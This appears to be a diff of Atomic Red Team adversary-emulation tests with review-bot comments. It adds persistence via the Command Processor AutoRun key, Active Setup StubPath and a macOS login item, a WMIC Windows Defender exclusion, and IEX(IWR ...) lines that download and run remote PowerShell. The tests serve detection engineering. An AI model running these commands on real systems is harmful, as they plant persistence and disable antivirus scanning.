Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -15,7 +15,7 @@ atomic_tests:
|
||||
- description: |
|
||||
AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
prereq_command: |
|
||||
if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
|
||||
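Review bot: The two `prereq_command` lines in this hunk disagree on where the DLL is checked — one reads `if (Test-Path "#{helper_file}") { exit 0} else { exit 1}`, the other uses the literal `PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll` that the description and `get_prereq_command` use, and the rendered gutter does not show which side is new. If `#{helper_file}` is the surviving form, it needs a matching entry under `input_arguments` (none is visible in the hunk) and `get_prereq_command` should download to the same `#{helper_file}` path, otherwise the existence check and the download can refer to different files. The enclosing test definition starts outside the hunk.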
@@ -26,3 +26,44 @@ atomic_tests:
|
||||
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
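Review bot: The test added at `- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)` is titled "(With Elevation)" but, unlike the HKLM test above it, carries no `elevation_required: true`, and the hunk ends right after its `name: powershell` line. Writing under HKCU does not need elevation, so the flag is presumably intentionally absent and it is the name that should change, e.g. `- name: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)`. Separately, the HKLM test's `New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"` errors if an `AutoRun` value already exists; adding `-Force` would make the test re-runnable, in line with the `-ErrorAction Ignore` its cleanup already uses.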
@@ -480,7 +480,7 @@ to point to a new startup folder where a payload could be stored to launch at bo
|
||||
| payload | executable to be placed in new startup location | String | C:\Windows\System32\calc.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
|
||||
@@ -228,7 +228,6 @@ atomic_tests:
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
Remove-Item "#{new_startup_folder}" -Recurse -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: HKCU - Policy Settings Explorer Run Key
|
||||
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
|
||||
@@ -332,3 +331,4 @@ atomic_tests:
|
||||
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
|
||||
@@ -0,0 +1,136 @@
|
||||
# T1547.014 - Active Setup
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/014)
|
||||
<blockquote>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
|
||||
|
||||
Adversaries may abuse Active Setup by creating a key under <code> HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
|
||||
|
||||
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup](#atomic-test-1---hklm---add-atomic_test-key-to-launch-executable-as-part-of-user-setup)
|
||||
|
||||
- [Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry](#atomic-test-2---hklm---add-malicious-stubpath-value-to-existing-active-setup-entry)
|
||||
|
||||
- [Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number](#atomic-test-3---hklm---re-execute-internet-explorer-core-fonts-stubpath-payload-by-decreasing-version-number)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup
|
||||
This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and
|
||||
forcing to run active setup using the "runonce.exe /AlternateShellStartup" command.
|
||||
Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
|
||||
|
||||
Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in.
|
||||
The payload will only run once unless the cleanup command is run in between tests.
|
||||
|
||||
[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** deff4586-0517-49c2-981d-bbea24d48d71
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| payload | Payload to run once during login | String | C:\Windows\System32\calc.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry
|
||||
This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| payload | Payload to run once during login | String | C:\Windows\System32\calc.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number
|
||||
This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user,
|
||||
which will force the StubPath payload (if set) to execute.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -0,0 +1,67 @@
|
||||
attack_technique: T1547.014
|
||||
display_name: 'Active Setup'
|
||||
atomic_tests:
|
||||
- name: 'HKLM - Add atomic_test key to launch executable as part of user setup'
|
||||
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
|
||||
description: |
|
||||
This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and
|
||||
forcing to run active setup using the "runonce.exe /AlternateShellStartup" command.
|
||||
Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
|
||||
|
||||
Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in.
|
||||
The payload will only run once unless the cleanup command is run in between tests.
|
||||
|
||||
[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: 'HKLM - Add malicious StubPath value to existing Active Setup Entry'
|
||||
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
description: |
|
||||
This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number
|
||||
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
description: |
|
||||
This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user,
|
||||
which will force the StubPath payload (if set) to execute.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
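Review bot: The second test's cleanup, `Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force` and the following `-Name "Version" -Force` line, omits the `-ErrorAction Ignore` that the first test's cleanup uses, so cleanup stops with an error whenever the HKCU `Version` value was never created (for instance if `runonce.exe` did not get to run); appending `-ErrorAction Ignore` to both lines keeps it idempotent. The third test has no `cleanup_command` at all; if the HKCU `Version` it sets to `0,0,0,0` is expected to be reset by the Active Setup run itself, a sentence in the description saying so would save the reader guessing, and if not, a cleanup restoring the previous value is missing. Its `command: |` also differs from the `|-` block style of the other two tests, which leaves a trailing newline in the executor command.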
@@ -10,6 +10,8 @@ Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/
|
||||
|
||||
- [Atomic Test #1 - Persistence by modifying Windows Terminal profile](#atomic-test-1---persistence-by-modifying-windows-terminal-profile)
|
||||
|
||||
- [Atomic Test #2 - Add macOS LoginItem using Applescript](#atomic-test-2---add-macos-loginitem-using-applescript)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -65,4 +67,47 @@ $(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalS
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Add macOS LoginItem using Applescript
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| scriptfile | path to Applescript source to add Safari LoginItem. | String | PathToAtomicsFolder/T1547.015/src/add_login_item.osa|
|
||||
| cleanup_script | path to Applescript source to delete Safari LoginItem. | String | PathToAtomicsFolder/T1547.015/src/remove_login_item.osa|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
osascript #{scriptfile}
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
osascript #{cleanup_script}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -39,4 +39,30 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
mv -Force #{settings_json_tmp} #{settings_json_def}
|
||||
taskkill /F /IM "#{calculator}" > $null
|
||||
name: powershell
|
||||
name: powershell
|
||||
- name: Add macOS LoginItem using Applescript
|
||||
auto_generated_guid: 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
description: |
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
scriptfile:
|
||||
description: path to Applescript source to add Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa
|
||||
cleanup_script:
|
||||
description: path to Applescript source to delete Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
|
||||
executor:
|
||||
command: |
|
||||
osascript #{scriptfile}
|
||||
cleanup_command: |
|
||||
osascript #{cleanup_script}
|
||||
name: bash
|
||||
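Review bot: `osascript #{scriptfile}` and `osascript #{cleanup_script}` pass the path unquoted, so a `PathToAtomicsFolder` containing a space breaks both the attack and the cleanup; `osascript "#{scriptfile}"` and `osascript "#{cleanup_script}"` are the safer forms. The test also has no `dependencies` block checking that the two `.osa` files exist, so a missing source file surfaces only as an osascript error rather than a clear prereq failure. The `backgrounditems.btm` detection hint in the description is useful; stating which macOS version it was observed on would help, since where login items are stored has changed across macOS releases.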
@@ -0,0 +1,5 @@
|
||||
tell application "System Events"
|
||||
get full name of current user
|
||||
make new login item at end of login items with properties ¬
|
||||
{path:"/Applications/Safari.app", name:"Safari"}
|
||||
end tell
|
||||
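Review bot: `get full name of current user` in this script (and again in the remove script at the next hunk) yields a value that nothing uses; if it is there deliberately to trigger the System Events automation prompt before the login-item call, a comment such as `-- triggers the System Events permission prompt before the login item is changed` would make that clear, otherwise the line can be dropped from both files. The remove script deletes by name with `delete login item "Safari"`, so a pre-existing user login item of that name would also be removed by cleanup; a one-line comment noting that caveat would help whoever runs it on a non-lab machine.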
@@ -0,0 +1,4 @@
|
||||
tell application "System Events"
|
||||
get full name of current user
|
||||
delete login item "Safari"
|
||||
end tell
|
||||
@@ -238,7 +238,7 @@ Upon execution administrative command prompt should open
|
||||
| executable_binary | Binary to execute with UAC Bypass | Path | C:\Windows\System32\cmd.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
|
||||
@@ -102,7 +102,6 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Bypass UAC by Mocking Trusted Directories
|
||||
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
|
||||
description: |
|
||||
|
||||
@@ -180,6 +180,7 @@ cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
|
||||
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
|
||||
Write-Host Follow the installation prompts to continue
|
||||
cmd /c "$env:Temp\winzip.exe"
|
||||
|
||||
@@ -106,6 +106,7 @@ atomic_tests:
|
||||
prereq_command: |
|
||||
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
|
||||
get_prereq_command: |
|
||||
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
|
||||
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
|
||||
Write-Host Follow the installation prompts to continue
|
||||
cmd /c "$env:Temp\winzip.exe"
|
||||
|
||||
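Review bot: The added `IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)` fetches the hash-verification helper from a moving `master` branch and executes it without any check of its own, which undercuts the hash verification it then performs on the WinZip download. Pinning the URL to a tag or commit of the helper, or calling the function from the installed Invoke-AtomicRedTeam module if the framework guarantees it is loaded, would make the prereq reproducible. The `if(Invoke-WebRequestVerifyHash ...){` block continues outside the hunk.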
@@ -78,6 +78,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
|
||||
|
||||
- [Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36---disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
|
||||
|
||||
- [Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37---wmic-tamper-with-windows-defender-evade-scanning-folder)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -1517,4 +1519,37 @@ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Applicatio
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning Folder
|
||||
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
|
||||
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```cmd
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -745,4 +745,19 @@ atomic_tests:
|
||||
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
|
||||
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: WMIC Tamper with Windows Defender Evade Scanning Folder
|
||||
auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
description: |
|
||||
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
|
||||
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
|
||||
cleanup_command: |
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
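Review bot: The exclusion path in `wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"` (and the matching `Remove` in `cleanup_command`) is a hard-coded literal rather than an `input_arguments` entry, unlike the parameterised tests elsewhere in this file; an `exclusion_path` argument defaulting to `ATOMICREDTEAM` would let operators exercise a realistic folder while keeping the cleanup in step with the attack command. Since the value is not an existing directory, the description could also say that the observable is the `MSFT_MpPreference` Add call itself rather than any file activity. wmic.exe is deprecated and no longer present by default on the newest Windows releases, so a `dependencies` entry with a `prereq_command` that checks for it would avoid a silent false negative.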
@@ -1168,3 +1168,17 @@ ffcbfaab-c9ff-470b-928c-f086b326089b
|
||||
f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
|
||||
9c10d16b-20b1-403a-8e67-50ef7117ed4e
|
||||
aca9ae16-7425-4b6d-8c30-cad306fdbd5b
|
||||
30cbeda4-08d9-42f1-8685-197fad677734
|
||||
59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
a574dafe-a903-4cce-9701-14040f4f3532
|
||||
36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
deff4586-0517-49c2-981d-bbea24d48d71
|
||||
39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
716e756a-607b-41f3-8204-b214baf37c1d
|
||||
6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
|
||||